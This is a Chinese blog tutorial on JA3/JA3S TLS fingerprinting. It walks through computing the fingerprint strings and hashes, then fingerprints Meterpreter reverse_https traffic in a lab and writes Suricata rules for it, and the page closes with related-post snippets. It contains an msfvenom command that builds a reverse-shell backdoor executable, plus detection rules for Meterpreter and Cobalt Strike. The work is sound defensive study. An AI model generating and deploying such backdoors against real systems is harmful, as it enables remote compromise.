利用JA3和JA3S识别加密数据流量

最新推荐文章于 2025-03-02 22:25:14 发布
最新推荐文章于 2025-03-02 22:25:14 发布
阅读量6.6k 收藏 24
点赞数 2
分类专栏: 网络安全 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/124699624
版权

1.前言

JA3 是一种比基于 IP 或基于域名的 IOC 更有效地检测 SSL 上的恶意活动的方法。 JA3 是根据SSL hello包的特征进行检测,而并非是检测通信内容。

在这些恶意软件样本中,C2服务器始终以完全相同的方式来响应恶意软件客户端,应该说是分毫不差。因此,即使流量被加密,并且,即使不知道C2服务器的IP地址或域名,因为它们会不断变化,我们仍然可以通过指纹来识别客户端和服务器之间的TLS协商,以提高恶意通信识别结果的置信度。

2.JA3计算原理

首先下载JA3工具,github地址为:https://github.com/salesforce/ja3 ,在这里以捕获的某网站为例,下面以这个pcap为例,介绍工具是如何计算的。

JA3 收集client Hello 数据包中以下字段的字节的十进制值;SSL 版本、接受的密码、扩展列表、椭圆曲线和椭圆曲线格式。然后,它按顺序将这些值连接在一起,使用“,”来分隔每个字段,并使用“-”来分隔每个字段中的每个值。

2.1 JA3字符串

2.1.1 第一部分

0x0303(16进制)=771(10进制)

771

2.1.2 第二部分

0x1301=4865;0x1302=4866····

4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53

2.1.3 第三部分

0-23-65281-10-11-35-16-5-13-18-51-45-43-27-17513-21

2.1.4 第四部分

0x001d=29;0x0017=23;0x0018=24

29-23-24

2.1.5 第五部分

0

最终组合为:771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-17513-21,29-23-24,0

2.2 JA3哈希计算原理

通过对JA3字符串加密为MD5 32位,得到ja3_digest

cd08e31494f9531f560d64c695473da9

3.JA3S计算原理

JA3S 是 JA3用于server 的 SSL/TLS 通信和指纹服务器如何响应特定客户端。实际上就是从Server Hello数据包中提取的指纹信息,同样拿这个包举例子。

JA3S主要提取以下内容:

  • TLSVersion : TLS版本信息
  • Ciphers : 支持的密码套件
  • Extensions : 支持的扩展项

3.1 JA3S字符串

3.1.1 第一部分

Version: TLS 1.2 (0x0303)

0x0303(16进制)=771(10进制)

3.1.2 第二部分

Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f)

0xc02f(16进制)=49199(10进制)

3.1.3 第三部分

Type: server_name (0)

Type: renegotiation_info (65281)

Type: ec_point_formats (11)

Type: session_ticket (35)

Type: application_layer_protocol_negotiation (16)

最终组成:771,49199,0-65281-11-35-16

3.2 JA3S哈希计算原理

对JA3S字符串进行哈希,771,49199,0-65281-11-35-16进行MD5加密,生成ja3_digest,即b898351eb5e266aefd3723d466935494

4.suricata JA3使用-MSF加密流量识别

Suricata提供了JA3集成(https://github.com/salesforce/ja3)。JA3用于对TLS客户端进行指纹识别。在使用suricata JA3识别之前,需要在suricat.yaml中开启对JA3的支持,将“app layer.protocols.tls.ja3 fingerprints”设置为“yes”

以下为JA3关键词:

  • ja3.hash:在JA3哈希(MD5)上匹配。
  • ja3.string:与JA3字符串匹配。
  • ja3s.hash:匹配JA3S哈希(MD5)
  • ja3s.string:与JA3S字符串匹配

识别MSF Meterpreter/reverse_https通信

4.1 生成后门文件

msfvenom -p windows/x64/meterpreter_reverse_https -f exe -o https.exe LHOST=192.168.233.131 LPORT=9999

4.2 开启抓包

首先开启抓包功能,在win10测试机运行后门文件,kali上开启端口监听

4.3 捕获TLS协商过程

4.4 使用JA3进行指纹识别

由于其协商并不是TLS/SSL默认通信端口443,这里使用-a参数,在任何端口上查找hello包,而不仅仅是443端口

python .\ja3.py --json -a .\xxx.pcapng

JA3字符串:771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0

JA3哈希值:72a589da586844d7f0818ce684948eea

4.5 使用JA3S进行指纹识别

python .\ja3s.py --json -a .\xxx.pcapng

JA3S字符串:771,49200,65281-23

JA3S哈希值:fd4bc6cea4877646ccd62f0792ec0b62

4.6 编写suricata规则

根据JA3工具获取到的指纹信息编写规则,在/var/lib/suricata/rules/suricata.rules中编写检测规则

#JA3指纹-MSF
alert tls any any -> any any (msg:"疑似 MSF Meterpreter/reverse_https 加密通信行为";ja3.hash; content:"72a589da586844d7f0818ce684948eea";classtype: misc-activity;sid:0001; rev:1;)
#JA3S指纹-MSF
alert tls any any -> any any (msg:"疑似 MSF Meterpreter/reverse_https 加密通信行为"; ja3s.hash; content:"fd4bc6cea4877646ccd62f0792ec0b62"; sid:0002;)

4.7 使用suricata进行包检测

suricata -r /root/msf.pcapng

4.8 查看检测结果

通过日志可以看到流量命中cat /var/lib/suricata/rules/fast.log

参考链接:

通过 JA3(S) 实现 TLS 指纹识别 - H0t-A1r-B4llo0n

https://xz.aliyun.com/t/3889?page=1

Suricata IDS 入门 — 规则详解 - SecPulse.COM | 安全脉搏

6.18. JA3关键词 — Suricata 7.0.0-dev 文档

JA3 JA3S JARM学习 - 歇马 - 博客园

加密流量分析与检测方法汇总
AI拉呱,专注于人工智与网络安全方面的研究,关注一起学习。
09-11 713
加密流量分析检测方法是网络安全领域的重要组成部分,尤其在面对日益增长的加密流量时,确保网络安全合规性变得更加复杂。
基于聚类法改进 JA3 指纹识别的恶意加密流量识别
罗伯特技术屋
11-25 903
摘 要随着互联网的发展及政务、商务领域电子化的普及,基于信息安全隐私保护的需求,以及人们的信息安全意识日益提高。现阶段,数据的传输通信大量采用加密技术,使加密流量呈爆发式增长。加密流量在保护个人数据安全的同时也让恶意流量的传播变得更加隐蔽,恶意加密流量检测已经成为信息安全领域的一个重要研究方向。基于此,提出一种基于 JA3 指纹识别技术的恶意加密流量识别方法,在传统 JA3 技术的基础上通过聚类法识别恶意流量,不经过解密即可对加密流量进行识别。内容目录:1 相关研究1.1 安全套接层 / 传输层安全协议
爬虫与反爬-Ja3指纹风控(Just a moment...)处理方案及参数说明
m0_67391521的博客
03-02 1675
当遇到一个比较强的 ja3 检测的时候,这个时候 curl_cffi 可能效果就会不尽人意,这个时候就需要自己定义一个ja3的指纹来进行访问,这里比较推荐的是使用 pyhttpx 模块,这个模块还有一个很强的地方,就是会固定住请求头的顺序(有部分网站会检测请求头字典的顺序)1、获取自己的指纹在实现自定义Ja3之前要先了解指纹,首先获取自己的指纹,这个网站是有非常多的,可以挑一个自己喜欢的2、指纹参数说明“”"
探索网络安全新维度:JA3 — SSL/TLS 客户端指纹识别系统
gitblog_00526的博客
08-09 1017
探索网络安全新维度:JA3 — SSL/TLS 客户端指纹识别系统 ja3JA3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way.项目地址:https://gitcode.com/gh_mirrors/ja/ja3 项目简介 JA3 是一种创新的 SSL/TLS ...
猿人学第19题-ja3指纹检测
weixin_45080737的博客
07-06 845
绕过ja3指纹检测
JA3指纹介绍
chqi987333的博客
09-26 1953
JA3指纹介绍
深度剖析ja3指纹及突破
app安全逆向、移动开发、tls/ja3、爬虫、反爬
03-13 2244
文章较之前有部分改动,对理解ja3来说不影响的。因为某大佬看了我的文章后说我的方法其实不是完美突破,所以完美两个字没了。可能有朋友会说"你这不是在炒冷饭吗?没意思”,不不,完全没这想法。我想的是1.为了留存备份,等我老了可以给子孙后代看,这个是我写的。2.以后大家不用再拿着那个pdf私下转发了。
反爬虫SSL TLS指纹识别绕过JA3算法.md
god_Zeo的安全博客
02-18 1万+
0x00 前言 ​ 有时候会发现一种情况,用正常浏览器可以访问,但是用脚本或者挂一下代理访问https的网站就直接405禁止访问了。 ​ 这种情况就有可能是 识别了你的TLS指纹,这种情况换随机UA都是没什么用的。 ​ 查阅资料之后,发现应该是waf识别你的TLS指纹,标记为恶意直接禁止了,其中识别的算法主要是利用JA3JA3S实现TLS指纹识别功能,所以学习了一下。 0x01 实际测试一下 测试代码 第一步,我们就看看我们的特征是什么,测试一下到底改hearder方法行不行。代码是测试代码,主要就是重
网络安全应急响应工具之-流量安全取证NetworkMiner
村中少年的专栏
12-29 3468
通过具体的数据流量介绍网络流量取证分析工具NetworkMiner的主要功能,为网络安全分析师,网络安全运营人员,网络安全应急响应人员提供趁手的工具
某东滑块验证逆向分析与算法还原
热门推荐
吴秋霖的博客
04-05 1万+
京东滑块参数逆向分析与算法还原!协议过滑块验证爬虫必备技能~
第十四章 加密安全 -- ssh 服务(一)
Raymond的博客
12-17 1052
ssh服务登录的常用验证方式用户/口令基于密钥基于用户口令登录验证客户端发起ssh请求,服务器会把自己的公钥发送给用户用户会根据服务器发来的公钥对密码进行加密加密后的信息回传给服务器,服务器用自己的私钥解密,如果密码正确,则用户登录成功基于密钥的登录方式首先在客户端生成一对密钥(ssh-keygen)并将客户端的公钥ssh-copy-id 拷贝到服务端当客户端再次发送一个连接请求,包括ip、用户名。
逆向案例二十二——请求头参数加密,某省公共资源交易电子公共服务平台
m0_57265868的博客
07-17 2076
好了,请求头参数的加密已经解决了,现在来分析返回内容的解密。很明显b是解密函数,进入b函数,发现疑似是ASE的解密,r["e"],r["i"]都是固定的,分别作为密钥向量。想要抓取数据,进行抓包分析,找到数据包,发现请求头有加密参数Portal-Sign,返回的数据内容也进行了加密。打上断点,分析,发现是d函数,结果一致的。直接搜索加密参数,找到加密位置,发现是在拦截器中,那么凭经验,解密位置肯定也在下面的拦截器中。打印一下参数,看有没有找对位置,发现找对了,直接进入f.getSign函数。
【IDS场景模拟】suricata检测HTTPS流量
three_1996的博客
03-25 3057
IDS:使用suricata对https流量进行监测。
JA3 项目使用教程
gitblog_00728的博客
08-20 393
JA3 项目使用教程 ja3Go package for Ja3 TLS client and server hello fingerprints项目地址:https://gitcode.com/gh_mirrors/ja3/ja3 项目介绍 JA3 是一个用于创建 SSL 客户端指纹的标准,它使得生成共享这些指纹变得简单。JA3 指纹是通过分析 SSL/TLS 客户端在握手阶段发送的加密套件...
Suricata镜像流量解析--Suricata部署
Zpz501的博客
01-05 5461
突然讲镜像流量解析有一些突兀,那就大致讲一下为什么要做流量镜像吧。 目前公司的应用安全防火墙(WAF)基于日志做的拦截,日志来源于Nginx服务器的lua模块,对于Nginx性能有一定的损耗,加上系统解耦的需要。所以考虑用流量镜像的方式,部署单独的集群对日志进行处理,好处有下边几点: 1. 系统解耦; 2. 提高lua拦截模块性能; 3. 满足WAF业务更多的特殊需求,如攻击统计,展示,告
如何利用网络元数据分析加密流量?
图幻未来的博客
12-30 462
*名词解释:**- 网络元数据: 描述网络元素的数据(例如 IP 地址、端口、协议类型等)及其之间的关系行为的信息;**简要说明**:通过提取分析大量的网络元数据实时产生的流量特征可帮助我们了解网络的拓扑结构信息流模式.这有助于我们更好地发现潜在的风险安全漏洞并提供有针对性的安全措施以防止未来的攻击行为的发生.
爬虫-关于网站开启浏览器TLS签名或者JA3指纹导致普通的http 客户端请求403拦截问题解惑
weixin_39370315的博客
05-14 488
博客来源,鉴于朋友问我,他通过RPA自动化脚本,执行一个网站资源请求爬取数据时,出现了403的状态码,咨询我如何解决一开始这情况,我是不知道如何处理的,不过偶尔机会,我在玩gpt4free的时候,发现有一个python库可以通过这种方式去进行仿真指纹浏览器进行请求,
【编程笔记】libpcap应用之JA3指纹
xiongcha的博客
10-20 1218
为了有效应对基于SSL/TLS协议加密的流量所带来的安全挑战,JA指纹技术应运而生。这项创新性的技术由三位杰出的安全研究员John Althouse、Jeff Atkinson以及Josh Atkins共同研发,并于2017年6月首次在GitHub平台上公开发布。JA指纹代表了一种新颖且高效的方法来识别分析传输层上的SSL/TLS通信特征。JA指纹本质上是一种对网络流量中的TLS握手信息进行细致解析的技术手段。
js逆向知识-Ja3指纹学习
m0_67391401的博客
03-08 1419
目录 一、ja3指纹介绍 二、ja3指纹解决方案 一、ja3指纹介绍 1、指纹:通过一些算法将一些特征加密得到的值,这些值往往能够区分你是谁。每个客户端会生成特定的ja3指纹,并不会随ipuseragent改变,通过ja3指纹可以定位识别到某个客户端(不限于浏览器、python等) 2、chrome浏览器查看ja3指纹:https://ja3er.com/json,或者https://ja3er.com/ 3、python的requests包查看ja3指纹 imp
Cobalt Strike 流量特征
最新发布
03-12
<think>好的,我需要回答用户关于Cobalt Strike网络流量特征分析检测的问题。首先,我得回顾已有的引用内容,看看有哪些关键点可以提取。引用[1]提到Cobalt Strike是C/S架构,分为客户端、服务端被控端,这可能涉及到流量中的客户端与服务端通信模式。引用[2]讨论了HTTP Beacon重定器流量走向分析,可能涉及HTTP请求的特征,比如URI、User-Agent等。引用[3]提到DNS idle,可能涉及DNS隧道或心跳机制。引用[4]提到了生成私钥公钥的方法,可能涉及SSL/TLS证书的特征。 接下来,我需要将这些信息组织成清晰的几个部分。可能分为流量特征检测方法两部分。流量特征包括协议层面的HTTP、DNS、SSL/TLS等,以及心跳机制、数据编码等。检测方法可以从流量分析、证书检测、行为分析等方面入手。 要注意用户可能的需求是检测或防御Cobalt Strike的攻击,因此需要给出具体的特征检测手段,比如特定的HTTP头部、User-Agent字符串、证书信息等。同时,引用中的端口转发工具可能涉及特定端口的使用,这也是一个特征点。 需要确保每个特征都有对应的引用来源,比如HTTP Beacon的User-Agent在引用[2]中提到,证书信息在引用[4]中涉及。此外,DNS心跳机制在引用[3]中可能有所说明。 还要注意用户的问题可能涉及流量分析工具的使用,比如Wireshark或Suricata,可以建议使用这些工具进行检测。最后,生成相关问题需要考虑用户可能进一步想了解的内容,比如如何分析加密流量或如何配置检测规则。</think>### Cobalt Strike网络流量特征分析 Cobalt Strike的流量特征主要体现在协议行为、加密方式、心跳机制等方面,以下是关键特征及检测方法: #### 一、流量特征 1. **HTTP Beacon通信** - **固定URI模式** HTTP请求路径通常包含固定字符串如`/submit.php`、`/pixel.gif`或随机生成的URI,但长度格式存在规律性(如`/abcd1234`)[^2]。 - **特定User-Agent** 默认使用类似`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36`的User-Agent,部分版本可能包含`CobaltStrike`标识。 - **POST数据编码** 数据传输采用Base64或XOR加密,HTTP POST请求体长度多为固定分段(如每段4KB)。 2. **DNS隐蔽信道** - **DNS心跳机制** 定期发送DNS查询请求(A记录或TXT记录),域名前缀包含编码数据(如`c2md5.example.com`),响应可能携带指令[^3]。 - **空闲查询(DNS Idle)** 长时间无任务时仍维持低频DNS查询,用于维持连接[^3]。 3. **SSL/TLS证书特征** - **自签名证书** 默认使用自签名证书,证书字段中可能包含`O=Cobalt Strike, CN=Major Cobalt Strike`等标识[^4]。 - **证书有效期异常** 部分证书有效期设置极长(如10年),与正常商业证书差异明显。 4. **心跳包与重定向** - **心跳间隔规律** Beacon默认每60秒发送心跳包,流量时间间隔呈现明显周期性。 - **端口转发工具特征** 使用`reGeorg`或`SOCKS Proxy`时,流量中可能包含`X-CMD`、`X-PORT`等特殊HTTP头部。 #### 二、检测方法 1. **流量特征检测** - 通过Wireshark筛选HTTP请求中的固定URI模式或异常User-Agent。 - 分析DNS日志中高频查询同一域名或子域名随机化的行为。 2. **证书指纹匹配** - 提取SSL/TLS证书的`Subject``Issuer`字段,匹配已知Cobalt Strike证书指纹[^4]。 - 使用JA3/JA3S检测工具识别加密协议特征。 3. **行为分析** - 监测低频但持续的心跳流量(如每分钟1次HTTP POST)。 - 识别同一内网IP与多个外部IP的异常通信(C2服务器切换)。 4. **入侵检测规则(示例)** ```yaml # Suricata规则示例 alert http any any -> any any (msg:"Cobalt Strike User-Agent Detected"; http.user_agent; content:"CobaltStrike"; nocase; sid:10001;) alert dns any any -> any any (msg:"Suspicious DNS Beacon"; dns.query; content:".example.com"; depth:12; sid:10002;) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值